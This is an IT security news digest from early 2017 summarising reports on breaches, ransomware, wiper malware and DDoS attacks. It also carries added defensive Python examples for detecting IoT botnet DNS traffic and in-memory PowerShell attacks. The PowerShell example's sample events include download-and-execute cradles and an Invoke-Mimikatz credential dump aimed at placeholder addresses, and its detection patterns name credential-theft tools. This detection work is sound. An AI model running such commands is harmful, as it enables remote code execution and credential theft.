CISCO ISSUES CRITICAL WARNING AFTER CIA WIKILEAKS DUMP BARES IOS (Internet Operating System) SECURITY WEAKNESS
(Computer World, dated 21st March 2017 author Michael Cooney)

Full article [Option 1]:

www.computerworld.com/article/3183143/security/cisco-issues-critical-warning-after-cia-wikileaks-dump-bares-ios-security-weakness.html

A vulnerability in Cisco's widely deployed IOS software that was disclosed in the recent WikiLeaks dump of CIA exploits has triggered the company to release a critical warning for its Catalyst networking customers. The vulnerability -- which could let an attacker cause a reload of an affected device or remotely execute code and take over a device -- affects more than 300 models of Cisco Catalyst switches from the model 2350-48TD-S Switch to the Cisco SM-X Layer 2/3 EtherSwitch Service Module.

(UAWARE COMMENT : Well so what. I haven't got a Cisco Switch; and you probably haven't got one either! Cisco equipment is probably the most used in the networking industry. It is used to switch data and other communications around ISP and telephone networks around the world, let alone global companies' private networks. So if cybercriminals have some form of free access, then that is real trouble.)

-----------------------
MICROSOFT FIXES RECORD NUMBER OF FLAWS
(Computer World, dated 15th March 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3181314/security/microsoft-fixes-record-number-of-flaws-some-publicly-known.html

Microsoft's batch of security patches for March is one of the largest ever and includes fixes for several vulnerabilities that are publicly known and actively exploited.

The company published 17 security bulletins covering 135 vulnerabilities in its own products and one separate bulletin for Flash Player, which has its security patches distributed through Windows Update. Nine bulletins are rated critical and nine are rated as important.

The affected products include Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Exchange, Skype for Business, Microsoft Lync, and Silverlight.

-----------------------
ANDROID DEVICES COMING WITH PREINSTALLED MALWARE
(Computer World, dated 13th March 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3179841/android/android-devices-coming-with-preinstalled-malware.html

The phone, given to you by your company, could be targeted at some point and end up with a malware infection, but you wouldn't expect the malware to be preinstalled "somewhere along the supply chain." Yet preinstalled malware is precisely what one security vendor found on 38 Android devices.

Check Point Software Technologies did not name the affected companies, saying only that the phones belonged to "a large telecommunications company" and "a multinational technology company." A good chunk of the infected phones were Samsung models, but phones by Lenovo, LG, Asus, ZTE, Vivo, Oppo and Xiaomi were also preinstalled with malware after leaving the manufacturers but before landing in the hands of the companies' employees.

-----------------------
DARK WEB REPORTEDLY SHRUNK BY 85% AFTER ANONYMOUS FREEDOM HOSTING II HACK
(International Business Times, dated 9th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/anonymous-freedom-hosting-ii-hack-reportedly-shrunk-dark-web-by-85-1610611

Dark web services have reportedly gone down recently. A massive cyberattack on Freedom Hosting II, a web hosting service that handled nearly 20% of all the dark web sites, mounted by the notorious Anonymous hacker group, is likely responsible for significantly shrinking the dark web.

According to a recent OnionScan report, only 4,400 dark web services currently remain active, a significant drop from the nearly 30,000 services that existed in 2016. This means that around 85% of the dark web was impacted following the cyberattack. Independent security researcher Sarah Jamie Lewis said the Anonymous Freedom Hosting II hack "not only removed many thousands of active sites but also may have affected other hosting providers who were hosting some infrastructure on top of Freedom Hosting II."

-----------------------
JAPAN BECOMING PRIME TARGET FOR RANSOMWARE
(Kyodonews, dated 7th March 2017 author Ichiro Kitamoto)

Full article [Option 1]:

http://english.kyodonews.jp/news/2017/03/462293.html

Computers of Japanese companies and individuals are becoming the prime target of an attack using "ransomware".

"Attacks on Japanese businesses have been particularly large in number," said Masakatsu Morii, professor of information and telecommunications engineering at Kobe University's Graduate School of Engineering. "The attackers may have come to know that Japanese would pay money," he said.

Computer security firm Trend Micro Inc. said it received reports of 2,810 cases in Japan of ransomware attacks in 2016, marking a 3.5-fold jump from the previous year.

The company's survey conducted last June shows that about 60 percent of the companies that were attacked paid ransoms. The payment in one case exceeded JP¥10 million (£70,600).

-----------------------
NEW DISK WIPING MALWARE TARGETING EUROPE AND SAUDI ARABIA
(International Business Times, dated 7th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/shamoon-2-0-stonedrill-new-disk-wiping-malware-targeting-europe-saudi-arabia-1610122

The dangerous disk wiping malware Shamoon, which was responsible for destroying nearly 35,000 computers at the Saudi Aramco in 2012 and other high-profile attacks across the Middle East after that, has a successor. A new wiper malware, dubbed StoneDrill, has been uncovered by security researchers, believed to be targeting more organisations across Saudi Arabia and Europe.

Researchers also uncovered that Shamoon 2.0's latest variant now also comes with fully functional ransomware capabilities and new 32-bit and 64-bit components. Researchers found that StoneDrill, in addition to targeting organisations in Saudi Arabia, also targeted the Kaspersky Security Network (KSN) in Europe, indicating that the cybercriminals behind the malware may be expanding their operations.

-----------------------
1.37 BILLION RECORDS LEAK AFTER SPAMMERS FORGOT TO PASSWORD PROTECT BACKUPS
(Computer World, dated 6th March 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3176901/security/1-37-billion-records-leak-after-spammers-forgot-to-password-protect-backups.html

Nearly 1.4 billion people are affected by a database records leak caused by spamming group River City Media (RCM) forgetting to password-protect their backups. Last week, MacKeeper security researcher Chris Vickery promised a "1.4 billion identity leak story" would be made public on Monday.

Today, Vickery described the leak from RCM as a "tangible threat to online privacy and security" because the database included nearly 1.4 billion email accounts tied to real names, IP addresses and "often" physical addresses. RCM accumulated that list via offers for things such as "free" gifts, credit checks, sweepstakes, education opportunities and techniques like co-registration in which a person's info is shared with unnamed affiliates after clicking "submit" or "I agree" on a website.


-----------------------
DDoS ATTACK TAKES DOWN LUXEMBOURG GOVERNMENT SERVERS
(International Business Times, dated 2nd March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/ddos-attack-takes-down-luxembourg-government-servers-1609380

The Luxembourg government's servers were hit by hackers in a massive DDoS attack that reportedly lasted over 24 hours. The attack, which began on Monday morning (27 February), is believed to have affected over a hundred websites hosted by the government's servers.

According to the Luxembourg Wort, the DDoS attack started at around 9.30am on Monday. An hour after the attack commenced, the Centre des Techniques de l'information de l'Etat (CTIE), which is the state-owned IT operator, posted on Twitter, confirming that it was the victim of a DDoS attack.

-----------------------
WHAT CAUSED THE CLIXSENSE PRIVACY BREACH THAT EXPOSED USER DATA
(Tech Target, dated March 2017 author Michael Cobb)

Full article [Option 1]:

http://searchsecurity.techtarget.com/answer/What-caused-the-ClixSense-privacy-breach-that-exposed-user-data

ClixSense is a paid to click service where members can make money online by completing surveys and viewing advertisements. A recent privacy breach led to details from more than 6.6 million ClixSense user accounts being offered up for sale, which also exposed the service's appalling information handling practices and lack of security controls to protect its users' personal data.

Information including passwords, email addresses, dates of birth, sex, first and last names, home addresses, IP addresses, account balances and payment histories was taken from a compromised database. The shocking thing is that the passwords were not hashed, but stored in plaintext, which is an inexcusable practice.

-----------------------

(2nd April 2017)


IT SECURITY REVIEW - FEBRUARY 2017

-----------------------
SMART TEDDY BEARS INVOLVED IN A CONTENTIOUS DATA BREACH
(Computer World, dated 28th February 2017 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3175466/security/smart-teddy-bears-involved-in-a-contentious-data-breach.html

If you own a stuffed animal from CloudPets, then you better change your password to the product. The toys -- which can receive and send voice messages from children and parents -- have been involved in a data breach involving more than 800,000 user accounts.

The breach, which grabbed headlines on Monday, is raising concerns from security researchers because it may have given hackers access to voice recordings from the toy's customers. But the company behind the products, Spiral Toys, is denying that any customers were hacked.

"Were voice recordings stolen? Absolutely not," said Mark Meyers, CEO of the company.

-----------------------
YAHOO DATA BREACHES
(International Business Times, dated 28th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/yahoo-data-breaches-heres-what-you-need-know-about-new-information-revealed-us-senate-1608917

Yahoo has provided some new information about the two massive data breaches it was hit with in 2013 and 2014. The information was detailed in a letter to the US Senate, which was meant to be a response to an angry letter, previously sent to CEO Marissa Mayer from Senators John Thune and Jerry Moran.

In the latest letter, sent by Yahoo VP and head of global public policy April Boyd, the firm claims that it was unaware of the 2013 data breach, until it was approached by law enforcement authorities about it in November 2016. However, the tech giant revealed that it was aware of the 2014 hack the same year that it occurred, raising questions about why the details of the breach were not disclosed until 2016.

-----------------------
NEW YORK AIRPORT LEAKS OVER 750Gb WORTH OF EMAILS, PASSWORDS AND GOVERNMENT FILES
(International Business Times, dated 24th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/new-york-airport-leaks-over-750gb-worth-emails-passwords-government-files-1608448

For months, the Stewart International Airport in New York was reportedly exposing sensitive internal data onto the internet without password protection. The data - over 750GB in total - has been described as a "complete compromise" of its network integrity.

Uncovered by a MacKeeper security researcher called Chris Vickery, the massive trove of sensitive data was wide-open to theft or compromise until as recent as this week (21 February) and had been publicly available since at least March last year.

The leaked data includes 107GB-worth of personal email correspondence from within the airport alongside letters from the Transportation Security Administration (TSA), a federal agency linked to the US Department of Homeland Security (DHS).

-----------------------
RANSOMWARE "CUSTOMER SUPPORT" CHAT REVEALS CRIMINALS' RUTHLESSNESS
(Computer World, dated 23rd February 2017 author Gregg Keizer)

Full article [Option 1]:

www.computerworld.com/article/3173698/security/ransomware-customer-support-chat-reveals-criminals-ruthlessness.html

Ransomware criminals chatting up victims, offering to delay deadlines, showing how to obtain Bitcoin, dispensing the kind of customer support that consumers lust for from their cable and mobile plan providers, PC and software makers?

Finnish security vendor F-Secure yesterday released 34 pages of transcripts from the group chat used by the crafters of the Spora ransomware family. The back-and-forth not only put a spotlight on the gang's customer support chops, but, said a company security advisor, illustrated the intertwining of Bitcoin and extortion malware.

"We should be thankful that there are at least some practical barriers to purchase Bitcoins," wrote Sean Sullivan of F-Secure in a Wednesday post to the firm's blog. "If it were any easier to do so, very little else would check the growth of crypto-ransomware's business model."

-----------------------
GOOGLE CHROME "MISSING FONT" HACK IS THE LATEST MALWARE SCAM YOU NEED TO AVOID
(International Business Times, dated 22nd February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/google-chrome-missing-font-hack-latest-malware-scam-you-need-avoid-1607942

Cybercriminals are skilled at coming up with new and innovative ways to trick web users into falling into carefully placed traps to then infect them with malware. One bullish tactic, now reportedly targeting Google Chrome, spreads via a sneaky "missing font" prompt.

The "drive-by infection" hack was spotted on a compromised WordPress website by a security researcher called Mahmoud Al-Qudsi, who found it to be using JavaScript to change how text was displayed on the website and urging users to download a "fix".

How does the Chrome hack work?

The malicious script caused text on the website to be replaced with "symbols and rubbish" in place of the content, Al-Qudsi wrote in a blog post. Screenshots show the hacker designed a warning box that appears legitimate, using Chrome's branding and colour scheme.

-----------------------
HACKERS CAN STEAL MILLIONS OF CARS AFTER DISCOVERING HUGE FLAW IN MANUFACTURERS' APPS
(International Business Times, dated 17th February 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-can-steal-millions-cars-after-discovering-huge-flaw-manufacturers-connected-car-apps-1607200

Security researchers have discovered that it is easy for attackers to gain access to millions of cars, simply by hacking into car-controlling mobile apps and using them to unlock the vehicles.

Kaspersky Lab researchers Mikhail Kuzin and Victor Chebyshev decided to analyse nine different connected car Android apps - designed to let drivers easily locate cars and unlock them via smartphone - by top car manufacturers.

Each app has been downloaded between 10,000 and one million times from the Google Play app store. The researchers discovered that all nine mobile apps store unencrypted usernames and passwords together with the car's unique Vehicle Identification Number (VIN) and, in some cases, even the car's licence plate number in plaintext .xml files on the device, which is a dangerous mistake.

-----------------------
HACKER BREACHED 63 UNIVERSITIES AND GOVERNMENT AGENCIES
(Computer World, dated 15th February 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3170724/security/hacker-breached-63-universities-and-government-agencies.html

A "Russian-speaking and notorious financially-motivated" hacker known as Rasputin has been at it again, hacking into universities and government agencies this time, before attempting to sell the stolen data on the dark web.

According to the security company Recorded Future, which has been tracking the cybercriminal's breaches, Rasputin's most recent victims include 63 "prominent universities and federal, state, and local U.S. government agencies." The security firm has been following Rasputin's activity since late 2016 when the hacker reportedly breached the U.S. Electoral Assistance Commission and then sold EAC access credentials.

All of the hacked agencies and universities have been notified about the breaches by Recorded Future. There were 16 U.S. state government victims, 6 U.S. cities and four federal agencies. Additionally, there were two "other" .gov sites which included Fermi National Accelerator Laboratory, "America's premier particle physics lab," and the Child Welfare Information Gateway, which is "a service of the Children's Bureau, Administration for Children and Families, U.S. Department of Health and Human Services."

-----------------------
ALLEGED RUSSIAN HACKER WHO USED A BOTNET TO STEAL FROM THOUSANDS OF US BANKS ARRESTED IN LA
(International Business Times, dated 11th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/alleged-russian-hacker-who-used-botnet-steal-thousands-us-banks-arrested-la-1606002

US authorities have reportedly arrested an alleged Russian hacker, believed to have stolen money from thousands of US bank accounts. The "extremely sophisticated" alleged hacker is believed to have used a 10,000-strong botnet of hacked computers to launch cyberattacks. Alexander Tverdokhlebov was arrested on 1 February in Los Angeles, according to reports.

US Secret Service agents' investigation into a Russian cybercrime gang reportedly led them to the 29-year-old, who is currently being held in the Metropolitan Detention Center in Los Angeles on cybercrime and wire fraud charges. Prosecuting attorneys describe him as being well connected with ties to several elite Russian language cybercrime forums, according to reports.

Investigators stumbled onto Tverdokhlebov while looking into online chats of another Russian - Vadim Polyakov, a 32-year-old from St Petersburg who, in 2016, pleaded guilty to the million-dollar Stubhub concert-ticket scam.

-----------------------
ITALY'S FOREIGN MINISTRY CAME UNDER CYBER ATTACK IN 2016
(Reuters, dated 10th February 2017)

Full article [Option 1]: www.reuters.com/article/uk-italy-cyber-idUKKBN15P291

Italy's foreign ministry was hacked last year, a source close to the department said on Friday, confirming a report in the Guardian newspaper which also said Russia was suspected of perpetrating the attack.

Last spring, hackers got into data systems at the ministry, which was then headed by now-Prime Minister Paolo Gentiloni. The attacks carried on for more than four months but did not gain access to classified information, the paper said.

The source said security had since been stepped up.

"These were not attacks on the encrypted computer system which carries the most important and sensitive information, but the email system for staff at the foreign ministry and embassies," the source said.

According to Britain's Guardian newspaper, two people with knowledge of the attack said the Russian state was believed to have been behind it. The source close to the ministry could not confirm this.

-----------------------
INDIA'S PROPOSED MASS SURVEILLANCE PROGRAMME SEEN AS A BLOW TO INTERNET FREEDOM
(International Business Times, dated 10th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/indias-proposed-mass-surveillance-programme-seen-blow-internet-freedom-1605802

India's new mass surveillance project, dubbed Centralised Monitoring System (CMS), will reportedly be fully operational by the first quarter of 2017, according to a draft Universal Periodic Review (UPR) report, which is due to be reviewed by the UN in the coming months. Concerns have been raised by privacy experts over the programme potentially expanding the government's control over internet rights and freedoms.

The draft report, which has broad similarities with previous editions, also reportedly comes with completely new topics related to the state's role in controlling the internet. The new topics feature in two dedicated sub-sections titled "Fundamental Freedoms and Participation in Public and Political Life", part of the "Civil and Political Rights" framework.

uaware note :
Would India's action be in preparation for the EU's new data protection laws, which will affect how EU-registered companies use data in non-EU countries?

-----------------------
TICKETBLEED : SECURITY FLAW REMOVES HTTPS ENCRYPTION FROM ALMOST 1,000 WEBSITES
(International Business Times, dated 10th February 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/ticklebleed-critical-f5-security-flaw-removes-https-encryption-almost-1000-websites-1605946

A security researcher has discovered a critical security bug in multiple F5 firewalls and load balancers that causes HTTPS encrypted connections to leak sensitive data. The bug affects almost 1,000 popular websites and website owners are advised to check for the vulnerability urgently.

The security flaw, known as Ticketbleed, was discovered by Cloudflare cryptography engineer Filippo Valsorda after some packets (a packet being a unit of data routed between an origin and a destination on the internet) sent by a Cloudflare customer using the Railgun web optimisation tool caused an error that confused Cloudflare's Railgun TLS stack.

-----------------------
VERIZON CYBERCRIME SLEUTH REVEALS HOW IoT ALMOST TOOK AN ENTIRE UNIVERSITY OFFLINE
(International Business Times, dated 10th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/verizon-cybercrime-sleuth-reveals-how-iot-almost-took-entire-university-offline-1605941

The rapid spread of internet-of-things (IoT) devices, from smart-fridges to web-connected home camera systems, has left many of these products wide open to hackers who can exploit weak security and lax passwords to enslave them into so-called 'botnets'.

These computer bot armies, which in reality are simply a hefty series of infected devices injected with a strain of malware, can easily - and cheaply - be deployed by cybercriminals to direct waves of traffic at a website's server in order to take it offline.

Dine (the investigator), a US Air Force veteran with more than a decade's worth of cyber forensics experience, said Verizon was called in to investigate after a suspicious number of lookups from within the network were directed at external domains.

Analysis of the university's network later identified over 5,000 devices that were making hundreds of Domain Name System (DNS) lookups every 15 minutes. "This was coming from their IoT network, coming from their vending machines and light sensors," he said.
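The pattern that gave the botnet away, hundreds of lookups per device every 15 minutes, is easy to surface from resolver logs once queries are bucketed by source address and time window. The block below is an added example, not code from Verizon or the article; the log format ("epoch client-ip query-name"), the addresses and the alert threshold are assumptions constructed for it.

```python
"""Windowed DNS-lookup rate detector for the IoT botnet pattern described above.

Added example, not code from Verizon or the article. Assumed log format
(constructed for this example): "<epoch-seconds> <client-ip> <query-name>".
"""
from collections import defaultdict

WINDOW_SECONDS = 15 * 60        # the 15-minute window mentioned in the article
LOOKUP_THRESHOLD = 100          # assumed alert level ("hundreds" of lookups per window)


def parse_dns_log(lines):
    """Yield (timestamp, client_ip, qname) from log lines; malformed lines are skipped."""
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            ts = int(parts[0])
        except ValueError:
            continue
        yield ts, parts[1], parts[2].rstrip(".").lower()


def lookups_per_window(records, window=WINDOW_SECONDS):
    """Count queries and distinct names per (client_ip, window index)."""
    counts = defaultdict(int)
    names = defaultdict(set)
    for ts, ip, qname in records:
        key = (ip, ts // window)
        counts[key] += 1
        names[key].add(qname)
    return counts, names


def flag_noisy_clients(lines, threshold=LOOKUP_THRESHOLD, window=WINDOW_SECONDS):
    """Return {client_ip: (max lookups in one window, distinct names in that window)}
    for every client whose busiest window reaches the threshold."""
    counts, names = lookups_per_window(parse_dns_log(lines), window)
    busiest = {}
    for (ip, idx), n in counts.items():
        if n > busiest.get(ip, (0, 0))[0]:
            busiest[ip] = (n, len(names[(ip, idx)]))
    return {ip: v for ip, v in busiest.items() if v[0] >= threshold}


def build_sample_log():
    """Constructed sample: one vending machine hammering the resolver, one quiet workstation."""
    base = 1_486_699_200            # an epoch value aligned to a 15-minute boundary
    lines = []
    for i in range(300):            # 300 lookups in 15 minutes, rotating through 50 names
        lines.append(f"{base + i * 3} 10.40.1.17 host{i % 50}.example.net.")
    for i in range(12):             # 12 lookups in the same 15 minutes
        lines.append(f"{base + i * 60} 10.10.5.2 www.example.org")
    lines.append("this line is malformed and is ignored")
    return lines


if __name__ == "__main__":
    for ip, (n, distinct) in sorted(flag_noisy_clients(build_sample_log()).items()):
        print(f"ALERT {ip}: {n} lookups for {distinct} distinct names "
              f"in one {WINDOW_SECONDS // 60}-minute window")
```

Run against real resolver logs the threshold needs tuning per network segment: a busy mail gateway legitimately makes far more lookups than a light sensor, so the alert is most useful when applied to the IoT VLAN on its own, where the baseline should be close to zero.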

-----------------------
CYBER CRIMS JUST KEEP GETTING BETTER, SAYS EU INFOSEC AGENCY
(ITNEWS, dated 9th February 2017 author Juha Saarinen)

Full article [Option 1]:

https://www.itnews.com.au/news/cyber-crims-just-keep-getting-better-says-eu-infosec-agency-450423

Criminals upped the ante last year and beat down cyber defences with new, superior attack types, the European Union Agency for Network and Information Security (ENISA) says in its annual threat report, taking stock of 12 months' worth of incidents.

Cyber defences matured and improved in 2016, but attackers remained one step ahead, ENISA said in the report, enjoying record turnovers for criminal activities.

ENISA said attackers abused unsecured internet of things (IoT) devices for massive denial-of-service traffic floods last year. It observed large, malicious IT and network infrastructures that withstand takedown and which allow for quick development and multi-tenancy.

-----------------------
MYSTERIOUS MALWARE WITH SUSPECTED LINKS TO RUSSIA INFECTING US-BASED EMBASSIES
(International Business Times, dated 8th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/mysterious-malware-suspected-links-russia-infecting-us-based-embassies-1605436

Security researchers have uncovered a hacking campaign that is actively targeting a slew of diplomatic, government and embassy websites in the US using a form of computer malware that has previously been linked to a Russian cybercrime group.

According to Forcepoint, a cybersecurity firm, the mysterious hackers are using a stealthy tactic long-associated with a group dubbed "Turla". Believed to be a reconnaissance mission, the researchers said it shows some signs of nation-state involvement.

"The majority of the targeted sites were ministry and embassy sites although sites with different profiles were also compromised," said security researcher Roland Dela Paz in a blog post. "Interestingly, all the targeted embassies [were] located in Washington DC."

The group's malware - also branded "Turla" - has attacked the foreign affairs ministries of Kyrgyzstan, Moldova and Uzbekistan, a political party in Austria, a socialist organisation in Spain and the US-based embassies of Iraq, Jordan, Zambia and Russia.

-----------------------
A RASH OF INVISIBLE-FILELESS MALWARE IS INFECTING BANKS AROUND THE GLOBE
(ARS-TECHNICA, dated 8th February 2017 author Dan Goodin)

Full article [Option 1]:

https://arstechnica.com/security/2017/02/a-rash-of-invisible-fileless-malware-is-infecting-banks-around-the-globe/

Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran's nuclear program.

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administration and security tools, including PowerShell, Metasploit, and Mimikatz, to inject the malware into computer memory.
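Because nothing is written to disk, the place to look for this tradecraft is the command lines and script blocks that the legitimate tools themselves log. The block below is an added example, not code from Kaspersky or the article: it triages PowerShell Script Block Logging events (Windows Event ID 4104) for download cradles, Invoke-Expression, encoded commands (which it decodes and rescans) and credential-theft tooling. The indicator patterns, hostnames, addresses and sample scripts are constructed for the example.

```python
"""Triage of PowerShell Script Block Logging events (Windows Event ID 4104) for the
in-memory tradecraft described above: download cradles, Invoke-Expression, encoded
commands and credential-theft tooling.

Added example, not code from Kaspersky or the article. The sample events and the
indicator patterns are constructed for this example.
"""
import base64
import re

INDICATORS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "reflective_load": re.compile(
        r"\[Reflection\.Assembly\]::Load|Invoke-ReflectivePEInjection|VirtualAlloc|WriteProcessMemory", re.I),
    "credential_theft": re.compile(r"Invoke-Mimikatz|sekurlsa|lsadump", re.I),
    "encoded_command": re.compile(
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String", re.I),
    "stealth_flags": re.compile(
        r"-nop\b|-NoProfile|-w(?:indowstyle)?\s+hidden|-NonI(?:nteractive)?\b", re.I),
}

ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_commands(text):
    """Return the plaintext of every -EncodedCommand payload (base64 of UTF-16LE) in text."""
    decoded = []
    for m in ENCODED_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def score_script_block(text):
    """Return the set of indicator names matched by the block or by its decoded payloads."""
    hits = set()
    for candidate in [text] + decode_encoded_commands(text):
        for name, pattern in INDICATORS.items():
            if pattern.search(candidate):
                hits.add(name)
    return hits


def triage(events, min_hits=2):
    """Return [(event id, sorted hits)] for events that hit at least min_hits indicators."""
    flagged = []
    for event in events:
        hits = score_script_block(event["script"])
        if len(hits) >= min_hits:
            flagged.append((event["id"], sorted(hits)))
    return flagged


def build_sample_events():
    """Constructed 4104-style events; hosts, addresses and scripts are invented."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
    encoded = base64.b64encode(cradle.encode("utf-16-le")).decode()
    return [
        {"id": 1, "host": "WS-FIN-07", "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
        {"id": 2, "host": "WS-FIN-07", "script": f"powershell.exe -NoP -W Hidden -Enc {encoded}"},
        {"id": 3, "host": "SRV-DB-02", "script": "IEX (New-Object Net.WebClient).DownloadString("
                                                 "'https://192.0.2.10/Invoke-Mimikatz.ps1'); "
                                                 "Invoke-Mimikatz -DumpCreds"},
        {"id": 4, "host": "SRV-WSUS", "script": "Invoke-WebRequest https://updates.corp.example/patch.msi "
                                                "-OutFile C:\\patch.msi"},
    ]


SAMPLE_EVENTS = build_sample_events()

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Event 4, a plain Invoke-WebRequest from a patching server, scores one indicator and is left alone at the default threshold; the encoded launcher and the Mimikatz cradle score four and three. Script block logging has to be switched on for any of this to exist, so turning it on (together with command-line auditing) is the first step, and the most effective one, against in-memory tooling.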

-----------------------
HONEYPOTS - A WEAPON THAT CAN PROTECT YOUR NETWORK BEFORE DEFENCES FAIL
(The Register, dated 8th February 2017 author Darren Pauli)

Full article [Option 1]: www.theregister.co.uk/2017/02/08/honeypots_feature_and_how_to_guide/

The hackers breached the transport operator's systems and before they knew it had sent a passenger train hurtling into a wall. And the only reason you didn't read about it in the papers was that the systems were an entirely fictitious network created in 2015 to test just how far snoopers or crims would go in attacking vulnerable transport systems.

"HoneyTrain was also a great experiment to analyze the adversary's moral limits," says Lukas Rist (@glaslos), chief research officer with the Honeynet Project, which helped build the fake train system known as the HoneyTrain. "They had attackers derailing a train or running the train at full speed into a dead end."

Over the course of two weeks, HoneyTrain, complete with working model trains and real security CCTV camera footage of train stations, suffered a staggering 2.7 million attacks.

Those attacks are a graphic demonstration of "honeypots", the practice of deliberate deception aimed at observing attackers.

The practice is widely used in information security circles, thanks largely to the Honeynet Project, a non-profit much-respected security initiative that maintains and advocates for honeynets through 23 global chapters. Honeypots and the much larger and more complex honeynets are popular research tools to lure attackers, revealing their tools and tactics, but also operate as a line of defence for corporate networks.

-----------------------
PHISHING : ANOTHER THING WE CAN BLAME ON BREXIT
(The Register, dated 7th February 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/02/07/phishing_trends/

Ransomware attacks are increasingly focusing on organisations that are more likely to pay up, such as healthcare, government, critical infrastructure, education, and small businesses.

Phishing volume grew by an average of more than 33 per cent across the five most-targeted industries, according to a study by PhishLabs out Tuesday. File-encrypting ransomware has become the predominant type of malware distributed via phishing, essentially because the type of crime is both straightforward and profitable.

Phishing volume peaked mid-year due to the influence of major global events, such as Brexit, and a spike in virtual web server compromises.

-----------------------
AUSTRIAN PARLIAMENT SAYS TURKISH HACKERS CLAIM CYBER ATTACK
(Reuters, dated 7th February 2017 authors Shadia Nasralla, Francois Murphy and Daren Butler)

Full article [Option 1]:

www.reuters.com/article/us-austria-hackers-parliament-idUSKBN15M0NX

Austria's parliament said on Tuesday that a Turkish hackers' group had claimed responsibility for a cyber attack that brought down its website for 20 minutes this weekend.

Aslan Neferler Tim (ANT), or Lion Soldiers Team, whose website says it defends the homeland, Islam, the nation and flag, without any party political links, claimed the attack, a parliamentary spokeswoman said.

Relations between Turkey and Austria soured last year after President Tayyip Erdogan cracked down on dissent following a failed coup, and Vienna has since made a solo charge within the European Union for accession talks to be dropped.

Reporting by Shadia Nasralla, Francois Murphy in VIENNA and Daren Butler in ISTANBUL; Editing by Louise Ireland

-----------------------
POLISH BANKS HIT BY MALWARE SENT THROUGH HACKED FINANCIAL REGULATOR
(The Register, dated 6th February 2017 author Kieren McCarthy)

Full article [Option 1]:

www.theregister.co.uk/2017/02/06/polish_banks_hit_by_malware_sent_through_hacked_financial_regulator/

Polish banks are investigating a massive systems hack after malware was discovered on several companies' workstations.

The source of the executables? The sector's own financial regulator, the Polish Financial Supervision Authority (KNF).

A spokesman for the KNF confirmed that their internal systems had been compromised by someone "from another country". But when it was discovered that the regulator's servers were hosting malicious files that were then infecting banks' systems, the decision was made to take down the KNF's entire system "in order to secure evidence."

According to one cyber security site that spoke to a number of banks and carried out a preliminary analysis, a number of banks confirmed that they had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared between the group of roughly 20 commercial banks in the country and other banks started reporting the same issues.

-----------------------
HACKERS TARGET INTERCONTINENTAL PAYMENT CARD DATA OF 12 US HOTELS IN MASSIVE DATA BREACH
(International Business Times, dated 4th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-target-intercontinental-payment-card-data-12-us-hotels-massive-data-breach-1604802

The InterContinental Hotels Group (IHG) has confirmed that 12 of its US-based hotels were hit with a data breach that saw hackers target payment card data. The confirmation comes a little over a month after the Holiday Inn parent company claimed that it was investigating claims of a potential breach, according to a report.

The hospitality giant said that payment cards used between August and December 2016, at restaurants and bars of the 12 hotels, were affected by the breach. The hackers infected the hotels' servers, which processed payment card data, with malware.

The malware searched for track data read from the magnetic stripe of payment cards, including data such as cardholders' name, card number, expiration date, and internal verification code. The hotel chain claimed that the malware did not affect payment cards used at the front desk.
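The "track data" a RAM scraper hunts for has a fixed layout, which is why the malware can find it with a regular expression and a Luhn check, and why a defender can run the same scan over a dump of a payment process to learn whether cleartext card data is sitting in memory. The block below is an added example, not the malware or anything from IHG or the article; the memory buffer is constructed and the card number is the standard 4111... test PAN.

```python
"""Scanner for magnetic-stripe track data in a memory buffer.

Added example, not the malware or anything from IHG or the article. A RAM scraper
looks for exactly these patterns; a defender can run the same scan over a dump of a
payment process to learn whether cleartext track data is present. The PAN in the
sample is the standard 4111... test number and the buffer is constructed here.
"""
import re

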